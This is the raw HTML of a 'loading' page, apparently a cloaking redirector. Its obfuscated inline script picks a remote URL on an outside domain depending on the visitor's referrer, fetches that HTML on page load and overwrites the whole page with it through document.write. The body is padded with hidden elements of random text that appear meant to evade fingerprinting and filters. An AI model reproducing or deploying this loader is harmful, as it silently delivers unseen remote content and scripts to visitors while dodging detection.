<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .R56CpKeSg {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .R56CpKeSg .GYKC675z5Q {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .R56CpKeSg .content {
            line-height: 50px;
            text-align: center
        }

        .R56CpKeSg .img {
            width: 100%
        }

        .R56CpKeSg .NX6mghlZZ {
            text-align: center
        }

        .R56CpKeSg .NX6mghlZZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .R56CpKeSg .NX6mghlZZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .R56CpKeSg .NX6mghlZZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .R56CpKeSg .NX6mghlZZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .R56CpKeSg .NX6mghlZZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .R56CpKeSg .NX6mghlZZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .R56CpKeSg .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eyIeOIuH08(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jNCl7G = eyIeOIuH08('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jNCl7G +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jNCl7G +".html?a=share";
		}
		
        UNUf9182ex=url+"#"+new Date().getTime();
        UNUf9182ex && function() {
            $.get(UNUf9182ex, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >Bo3mZEZu3j9KpYzE6QCA</h1>
<div style='display:none'>u0H1sTPgOPWOLEBfv3zr2jZBsYVfLmveGPbUOs1IqLi40TLW9ehrhCu6R7vdtEh6xajAhCArz7j8r2g</div>
<h1 style='display:none' >Bo3mZEZu3j9KpYzE6QCA</h1>
<b style='display:none' >IpcF1tlBjuMi1R2s0pd9m1oR3IwbJqWrmOyr3</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>GCmltRpvWKlXqj7UNSCNV</a>
<ul style='display:none' >zVVb4jc8zu6Yfl7k5rfp3drYBSeZDvSOnl</ul>
<h1 style='display:none' >Bo3mZEZu3j9KpYzE6QCA</h1>
<p  style='display:none'>mKRyOrREqohuinaxTLTaVUhVxgiGzjEAlIa4mjHtuSysc7m0</p><div class="R56CpKeSg">
    <div class="GYKC675z5Q">
        <div class="NX6mghlZZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >b0fvWAYNPHAHDcXk2kVIpFmaFj9w2rXnrRZqABH</li>
<b style='display:none' >ltjC44lacHkoIrvtSJbB6FxRRJYwIqaVlk0TGBT6VCfP</b>
<h1 style='display:none' >wfwaF5pSGghlpB96YbIekmTAeGBALYOZJOynsiaGrFJII4U86rmwV9PtviHnEgR2MQ6jKNOyB</h1>
<ul style='display:none' >tt0ucZqw5PVft</ul>
<h1 style='display:none' >wfwaF5pSGghlpB96YbIekmTAeGBALYOZJOynsiaGrFJII4U86rmwV9PtviHnEgR2MQ6jKNOyB</h1></body>
</html>